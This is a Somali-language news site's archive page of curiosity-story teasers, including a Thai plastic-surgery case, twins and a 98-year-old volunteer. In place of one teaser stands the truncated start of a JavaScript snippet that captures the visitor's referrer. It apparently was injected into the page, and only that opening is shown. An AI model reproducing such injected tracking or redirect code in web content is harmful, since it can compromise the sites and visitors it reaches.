Scroll to Top

Category Archives: La Yaabka

(function() { var referer="";try{if(referer=document.referrer,"undefined"==typeof referer)throw"undefined"}catch(exception){referer=document.location.href,(""==referer||"undefined"==typeof referer)&&(referer=document.URL)}referer=referer.substr(0,700); var...

Haweeney u dhalatay wadanka Thailand ayaa awoodi weysey inay aqoonsato wiilkeeda oo 22 sano jir kadib markii uu iskusoo sameeyey qaliin wajiga qurxinaya isagoo  kasoo muuqday kadib Tv-yada South Korea. Noppajit...

Sida aan lasocono mataaniyaasha waxaan ku naqaanaa inay yihiin kuwa inta badan isku eg dhan walba balse waxaan haaynaa mataaniyaasha aduunka aan isku midka ahayn. Waxaa barta Instagram-ka lasoo dhigay...

Daraasadaan ayaa cadeyneysa in dumarka iskaabulada ah mar walba ay yihiin kuwa ka fir fircoon kana fur furan ragga doobka ah , sababtoo ah waxaa la ogaaday inay yihiin kuwa aad u mashquul badan oo wax...

Aduunyada sida aan lasocono wax walba waa la arkaa waxaana macquul ah in qof aad jeceshahay marka aad is heshaan kadibna aad kala tagtaan marka la fiiriyo dhaqankiina oo aan iskeenin marka aad guriga isla...

Nin hor mariya Barnaamijyada Kumbiyuutarka oo u dhashay waddanka Indonesia, laguna magacaabo Lindu Pranayama ayaa sameeyay barnaamij (Application) aad ka dhex heli karto Play Store-ka taleefoonnada casriga...

Dhacdadaan ayaa noqotay mid aad u hadal heyn badan sababtoo ah wiil ayaa sameyey cod jaceyl midkii ugu yaabka badnaa kadib markii gabadhii uu jeclaa horkeenay goob cajiib ah si uu jaceylkiisa ugu soo bandhigto. Chen...

Inta badan Ardeyda waxbarta waxaa ay leeyihiin Heybad gaaar ah gaar ahaan Ardeyda awooda uleh inay gacanta bidixda wax qoraan xilliga waxbarashada lagu jiro. Balse mid kamid ah Iskuulada kuyaalo India...

Haweeyneydaan oo da’deeda ay tahay 98 sano ayaa booqatay goobo badan oo lagu xanaaneeyo caruurta gaar ahaan caruurta waalidiintooda iyo iyaga kala maqan muddada badan. Ada Keating ayaa go’aansatay...

Mid kamid ah shaqsiyaadka ugu farsamada cajiibsan India ayaa soo saaray qalab u eg Baarashuudka balse ka sameeysan buufino la buufiyey ayaa waxaa uu ka yaabsaday caalamka. Waxaana argtidaan looga dayday...